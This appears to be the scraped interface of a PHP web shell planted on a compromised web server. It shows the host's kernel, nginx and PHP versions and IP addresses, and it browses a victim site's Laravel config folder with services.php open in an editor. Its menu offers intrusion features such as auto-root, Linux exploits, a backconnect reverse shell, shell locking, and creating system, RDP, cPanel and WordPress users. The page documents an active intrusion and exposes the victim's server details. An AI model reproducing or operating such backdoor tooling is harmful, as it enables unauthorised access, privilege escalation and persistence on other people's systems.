Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya.biz /
amatya /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
app.php
9.41
KB
-rwxrwxr-x
auth.php
3.2
KB
-rwxrwxr-x
broadcasting.php
1.57
KB
-rwxrwxr-x
cache.php
2.94
KB
-rwxrwxr-x
database.php
4.56
KB
-rwxrwxr-x
filesystems.php
2.08
KB
-rwxrwxr-x
hashing.php
1.53
KB
-rwxrwxr-x
image.php
508
B
-rwxrwxr-x
lfm.php
6.09
KB
-rwxrwxr-x
logging.php
2.59
KB
-rwxrwxr-x
mail.php
4.59
KB
-rwxrwxr-x
queue.php
2.59
KB
-rwxrwxr-x
services.php
1.29
KB
-rwxrwxr-x
session.php
6.81
KB
-rwxrwxr-x
view.php
1.03
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : services.php
<?php return [ /* |-------------------------------------------------------------------------- | Third Party Services |-------------------------------------------------------------------------- | | This file is for storing the credentials for third party services such | as Stripe, Mailgun, SparkPost and others. This file provides a sane | default location for this type of information, allowing packages | to have a conventional place to find your various credentials. | */ 'mailgun' => [ 'domain' => env('MAILGUN_DOMAIN'), 'secret' => env('MAILGUN_SECRET'), 'endpoint' => env('MAILGUN_ENDPOINT', 'api.mailgun.net'), ], 'postmark' => [ 'token' => env('POSTMARK_TOKEN'), ], 'ses' => [ 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION', 'us-east-1'), ], 'sparkpost' => [ 'secret' => env('SPARKPOST_SECRET'), ], 'stripe' => [ 'model' => App\User::class, 'key' => env('STRIPE_KEY'), 'secret' => env('STRIPE_SECRET'), 'webhook' => [ 'secret' => env('STRIPE_WEBHOOK_SECRET'), 'tolerance' => env('STRIPE_WEBHOOK_TOLERANCE', 300), ], ], ];
Close